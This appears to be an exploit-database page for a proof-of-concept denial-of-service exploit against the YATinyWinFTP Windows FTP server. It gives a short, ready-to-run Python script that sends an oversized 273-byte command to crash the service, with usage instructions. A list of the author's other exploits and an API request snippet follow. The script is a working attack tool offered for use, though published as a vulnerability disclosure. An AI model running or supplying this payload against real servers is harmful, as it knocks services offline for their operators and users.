Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
strider
Platform
windows
Release date
2020-11-30
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | # Exploit Title: YATinyWinFTP - Denial of Service (PoC) # Google Dork: None # Date: 20.08.2020 # Exploit Author: strider # Vendor Homepage: https://github.com/ik80/YATinyWinFTP # Software Link: https://github.com/ik80/YATinyWinFTP # Tested on: Windows 10 ------------------------------[Description]--------------------------------- This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end. The result it crashes -----------------------------[Exploit]--------------------------------------------- #!/usr/bin/env python3 # -*- coding:utf-8 -*- import socket, sys target = (sys.argv[1], int(sys.argv[2])) buffer = b'A' * 272 + b'\x20' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(target) print(s.recv(1024)) s.send(buffer) s.close() -----------------------------[how to run]----------------------------- C:\> TinyWinFTP.exe servepath port ~$ python3 exploit.py targetip port Boom! |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-11-30 | "YATinyWinFTP - Denial of Service (PoC)" | remote | windows | strider |
2019-09-27 | "InoERP 0.7.2 - Persistent Cross-Site Scripting" | webapps | php | strider |
2019-09-25 | "WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting" | webapps | php | strider |
2019-05-08 | "MiniFtp - 'parseconf_load_setting' Buffer Overflow" | local | linux | strider |
2018-11-26 | "MariaDB Client 10.1.26 - Denial of Service (PoC)" | dos | linux | strider |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/49127/?format=json')
For full documentation follow the link above